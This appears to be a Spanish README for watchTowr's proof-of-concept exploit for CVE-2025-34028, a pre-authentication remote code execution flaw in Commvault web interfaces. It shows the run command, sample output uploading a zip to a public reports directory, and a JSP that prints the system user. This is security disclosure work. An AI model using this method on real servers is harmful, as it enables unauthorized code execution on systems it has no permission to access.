
Exploit de prueba de concepto para CVE-2025-34028, que demuestra ejecución remota de código sin autenticación previa en interfaces web de Commvault mediante carga maliciosa de JSP.
Una Prueba de Concepto de Ejecución Remota de Código Preautenticada en Commvault
Consulte nuestra publicación en el blog para obtener detalles técnicos
python watchtowr-vs-commvault-rce-CVE-2025-34028.py --url https://192.168.1.1
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchtowr-vs-commvault-rce-CVE-2025-34028.py
(*) Commvault Unauthenticated Remote Code Execution (CVE-2025-34028) POC by watchTowr
- Sonny , watchTowr ([email protected])
CVEs: [CVE-2025-34028]
[*] Targeting https://192.168.1.1
[*] Verifying presence of Commvault
[*] Uploading to /reports/MetricsUpload/2GfMIJdK/
[*] Fetching System User from https://192.168.1.1/reports/MetricsUpload/2GfMIJdK/.tmp/dist-cc/dist-cc/shell.jsp
[*] System User EC2XXX-XXXXXXX$
Este script es una prueba de concepto para CVE-2025-34028, para las Interfaces Web de Commvault. Al cargar un archivo zip que contiene un archivo .jsp de ejecución de código, el archivo zip se carga en un directorio público y el usuario del sistema se detalla en la respuesta. Más detalles se describen en nuestra [publicación en el blog] (https://labs.watchtowr.com/).
El script PoC utiliza un archivo zip codificado con los siguientes archivos:
Contenido de Shell.jsp:
<%@ page import="java.util.*" %>
<html>
<body>
<h3>System Information</h3>
<p>Current User: <%= System.getProperty("user.name") %></p>
</body>
</html>
Más detalles en Aviso de Commvault
Para las últimas investigaciones de seguridad, siga al equipo de watchTowr Labs